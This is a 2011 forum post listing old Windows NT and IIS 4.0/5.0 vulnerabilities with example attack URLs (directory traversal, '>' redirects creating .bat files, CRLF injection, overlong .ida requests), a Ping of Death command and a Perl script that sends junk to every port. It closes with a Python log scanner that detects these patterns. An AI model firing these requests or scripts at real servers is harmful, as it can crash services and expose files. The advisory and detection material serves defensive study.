Title: NT vulnerabilities and descriptions (English)
Author: 雜七雜八   Time: 2011-1-13 17:12

Affected systems: 4.0, IIS 1.0

A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
--------------------------------------------------------------------
Affected systems: 4.0

A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.
If the file 'target.bat' already exists, it will be truncated.
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
----------------------------------------------------------------------
Affected systems: 3.51, 4.0

Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'. The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/
use Socket;
use FileHandle;
require "chat2.pl";   # old chat2.pl library; supplies chat::open_port, chat::print, chat::close

$systemname = shift @ARGV or die "usage: perl poke servername\n";
$verbose    = 1;      # tell me what you're hitting
$knownports = 1;      # don't hit known problem ports

# start at port 1: the posted version looped from $0 (the script name), which is a bug
for ($port = 1; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;  # skip ports that refuse the connection
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}
/*end poke code*/
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0

Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr>, will crash IIS.
This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error. The error occurred on date @ time. The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT)".

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0

Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida the server will either crash (an effective DoS) or report its current directory location (revealing the directory structure).

--------------------------------------------------------
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge of how the web site is organized and the directory structure of the server.
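Most of the items above (the '..\..' traversal, the '>' redirect in /scripts URLs, the %0A%0D trick, and the .ida/.idq probes and overlong dotted URLs) leave a recognisable trace in the web server's request log. The following is an added example, not part of the original post, that runs simple detection rules over constructed IIS-style log lines; the line format, rule names and the length threshold for the dotted URL are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log lines (method, URL, status); not from any real server.
SAMPLE_LOG = [
    "GET /default.htm 200",
    r"GET /..\..\somefile.txt 200",
    r"GET /scripts..\..\scriptname 200",
    r"GET /scripts/exploit.bat>c:\inetpub\target.bat 200",
    r"GET /scripts/script_name%0A%0D>c:\temp\out.bat 200",
    "GET /anything.ida 404",
    "GET /search.idq 404",
    "GET /" + "." * 300 + "ida 500",
]

# One rule per pattern described in the advisory text.  The thresholds for the
# overlong dotted URL are an assumption (the text speaks of ~25 KB of dots).
RULES = [
    ("path-traversal",      lambda u: re.search(r"\.\.[\\/]", u) is not None),
    ("scripts-traversal",   lambda u: u.lower().startswith("/scripts..")),
    ("shell-redirect",      lambda u: ">" in u),
    ("crlf-in-url",         lambda u: "\n" in u or "\r" in u),
    ("ida-idq-probe",       lambda u: re.search(r"\.id[aq]$", u, re.I) is not None),
    ("overlong-dotted-url", lambda u: len(u) > 255 and u.count(".") > 200),
]


def classify(line: str) -> list:
    """Return the names of all rules matched by one log line's URL."""
    parts = line.split()
    if len(parts) < 2:
        return []
    url = unquote(parts[1])  # decode once so %0A/%0D become visible to the rules
    return [name for name, pred in RULES if pred(url)]


def scan(lines) -> list:
    """Return (url prefix, [rule names]) for every flagged line."""
    findings = []
    for line in lines:
        hits = classify(line)
        if hits:
            findings.append((line.split()[1][:40], hits))
    return findings


if __name__ == "__main__":
    for url, hits in scan(SAMPLE_LOG):
        print(f"{url:40} -> {', '.join(hits)}")
```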